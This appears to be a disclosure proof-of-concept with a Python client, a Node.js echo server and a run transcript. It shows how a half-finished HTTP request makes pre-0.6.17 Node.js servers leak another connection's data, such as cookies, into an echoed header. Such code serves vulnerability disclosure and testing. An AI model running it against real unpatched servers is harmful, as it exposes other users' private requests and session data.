stringptr-update-poc-client.py
#!/usr/bin/env python
 
import socket
import sys
import time
 
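def round_up(n, r):
    """Round *n* up to the nearest multiple of *r*.

    Args:
        n: non-negative integer to round (a buffer length in this script).
        r: positive rounding granularity (the script uses 16).

    Returns:
        The smallest multiple of ``r`` that is greater than or equal to ``n``.
    """
    # Integer ceiling division.  The original used float "/" wrapped in
    # int(), which loses precision above 2**53 and differs between
    # Python 2 (integer division) and Python 3 (true division); "//" is
    # exact for any int and behaves the same on both.
    return (n + r - 1) // r * r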
 
# --- connection 1: leave a request half-finished --------------------------
# The target is the companion stringptr-update-poc-server.js listening on
# localhost:8080.
s = socket.socket()
s.connect(("localhost", 8080))

# The request ends with a header named "X" followed by a line that begins
# with a single space and has no terminator, so the server cannot treat the
# request as complete until the trailing "\r\n\r\n" is sent further below.
buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s.sendall(buf)
time.sleep(0.1)  # let the server parse the partial request before step 2

# --- connection 2: another client's data arrives while #1 is pending -----
s2 = socket.socket()
s2.connect(("localhost", 8080))

buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."
s2.sendall(buf2)
time.sleep(0.1)

# Finish request #1: pad with "A"s to a length derived from the 16-byte
# rounded sizes of both buffers, then terminate the headers.  On a server
# affected by the issue fixed in Node 0.6.17 (see the advisory linked on
# this page) the echoed "X" header carries connection #2's data, as the
# transcript below shows; a patched server only echoes what this client sent.
s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")

# Dump the server's reply until it closes the connection.
# NOTE(review): written for Python 2 -- sendall() is handed str objects and
# recv() output goes straight to sys.stdout.write(); on Python 3 both sides
# would need bytes.  Neither socket is closed explicitly; the OS releases
# them at process exit.
while True:
    b = s.recv(1024)
    if not b:
        break
    sys.stdout.write(b)
stringptr-update-poc-server.js
#!/usr/bin/env node
 
var http = require('http');
 
// Minimal HTTP server used as the target for the companion PoC client:
// every response echoes back the value of the request's "X" header.
function echoXHeader(req, res) {
  var xValue = req.headers['x'];
  res.writeHead(200, {'Content-Type': 'text/plain'});
  res.end('X header: ' + xValue);
}

http.createServer(echoXHeader).listen(8080);

See http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/

$ ./node ~/stringptr-update-poc-server.js &
[1] 11801
$ ~/stringptr-update-poc-client.py
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Wed, 18 Apr 2012 00:05:11 GMT
Connection: close
Transfer-Encoding: chunked

64
X header:
 This is private data, perhaps an HTTP request with a Cookie in it.
0

